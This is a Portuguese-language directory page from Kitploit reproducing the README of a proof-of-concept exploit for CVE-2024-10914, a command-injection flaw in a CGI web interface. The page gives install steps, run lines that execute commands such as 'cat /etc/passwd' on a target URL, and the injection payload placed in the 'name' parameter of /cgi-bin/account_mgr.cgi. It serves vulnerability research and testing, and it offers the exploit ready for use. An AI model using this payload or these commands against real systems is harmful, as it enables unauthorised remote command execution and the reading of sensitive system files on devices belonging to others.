Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10914__POC — PoC para explorar o CVE-2024-10914 | Kitploit
Ferramentas/GitHubGitHub/0xss3k/cve-2024-10914__poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC para explorar o CVE-2024-10914

Ver Repositório
3há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-10914 - Prova de Conceito

Exploit para vulnerabilidade de injeção de comando no endpoint /cgi-bin/account_mgr.cgi. Esta vulnerabilidade permite executar comandos arbitrários no sistema afetado através de parâmetros não sanitizados.

Descrição da Vulnerabilidade

CVE-2024-10914 é uma vulnerabilidade de injeção de comandos que afeta dispositivos com interface web CGI. A aplicação vulnerável não valida corretamente o parâmetro name na solicitação cgi_user_add, permitindo que um atacante injete comandos do sistema que serão executados com privilégios da aplicação.

Requisitos

  • Python 3.7+
  • biblioteca requests

Instalação

Clone o repositório e instale as dependências:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Ou instale manualmente:

root@kitploit:~
pip install requests
Baixar ferramenta

Uso

O script fornece dois argumentos:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

Parâmetros

  • -u, --url (obrigatório): URL do alvo (exemplo: http://192.168.1.1)
  • -c, --command (opcional): Comando a executar (padrão: id)

Exemplos

Executar comando id:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Executar comando personalizado:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Listar arquivos:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Funcionamento Técnico

O exploit envia uma solicitação GET ao endpoint vulnerável com o seguinte payload:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

A string vazia é fechada com aspas e o comando desejado é injetado, que é executado no contexto do servidor.

Resposta

O script mostrará:

  • Estado da conexão
  • Payload enviado
  • Código de estado HTTP
  • Resposta completa do servidor

Aviso Legal

Este código é fornecido apenas para fins educacionais e de pesquisa de segurança. Deve ser utilizado apenas em sistemas sobre os quais você tenha autorização explícita. O uso não autorizado deste exploit pode violar leis locais e constituir crime. O autor não se responsabiliza pelo uso indevido desta ferramenta.

Referências

  • CVE-2024-10914
  • CVSS Score: TBD

Autor

SS3K

Licença

Não especificada